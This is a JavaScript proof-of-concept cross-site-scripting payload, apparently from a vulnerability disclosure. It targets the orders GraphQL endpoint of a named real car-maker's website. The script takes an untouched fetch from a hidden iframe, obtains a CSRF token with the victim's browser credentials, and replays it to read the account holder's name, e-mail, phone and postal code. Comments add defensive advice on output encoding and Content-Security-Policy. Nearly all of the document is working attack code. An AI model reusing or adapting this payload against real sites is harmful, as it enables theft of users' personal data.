// Proof-of-concept payload showing the impact of a cross-site-scripting flaw:
// once script runs in the page, it can ask the orders GraphQL endpoint for a
// CSRF token and replay that token on a second request sent with the browser's
// credentials. The CSRF token therefore gives no protection once script
// injection is possible; the fix belongs at the injection point (output
// encoding / sanitisation), with a restrictive Content-Security-Policy as
// defence in depth.
alert('XSS!!!...');
console.log('Hacked');
console.log('Grabbing CSRF token...');

// A hidden iframe supplies a second `fetch` reference. The original note says
// only that it "doesn't do annoying stuff" -- presumably the page wraps
// window.fetch (assumption; not visible here). Defender takeaway: a client-side
// wrapper around fetch is not a security boundary.
const hiddenFrame = document.createElement("iframe");
hiddenFrame.style.display = "none";
document.body.appendChild(hiddenFrame);
const { fetch: pristineFetch } = hiddenFrame.contentWindow;

const ORDERS_GRAPHQL_URL = "https://rivian.com/api/gql/orders/graphql";

// Sends one GraphQL document to the orders endpoint. `credentials: "include"`
// asks the browser to attach its stored credentials for that site.
const postToOrdersApi = (headers, query) =>
  pristineFetch(ORDERS_GRAPHQL_URL, {
    method: "POST",
    credentials: "include",
    headers,
    body: JSON.stringify({ query }),
  });

// Step 1: request a CSRF token. The "Dc-Cid" value is an arbitrary string here;
// whether the server requires the header is not shown (assumption to confirm).
postToOrdersApi(
  { "Content-Type": "application/json", "Dc-Cid": "anything" },
  "mutation createCsrfToken { createCsrfToken { csrfToken } }",
)
  .then((tokenResponse) => tokenResponse.json())
  .then((tokenPayload) => {
    const { csrfToken } = tokenPayload.data.createCsrfToken;
    console.log('CSRF token: ' + csrfToken);
    console.log('Now, I can do whatever I want. Calling getUserDetails...');

    // Step 2: replay the token on a query that returns the account's
    // name, e-mail, phone and postal code.
    return postToOrdersApi(
      {
        "Content-Type": "application/json",
        "Csrf-Token": csrfToken,
        "Dc-Cid": "anything",
      },
      "query getUserDetails { user { firstName lastName email { email } phone { countryCode number formatted } address { postalCode } } }",
    );
  })
  .then((detailsResponse) => detailsResponse.json())
  .then((detailsPayload) => {
    // The PoC only prints the response to the console.
    console.log(JSON.stringify(detailsPayload, null, 2));
  });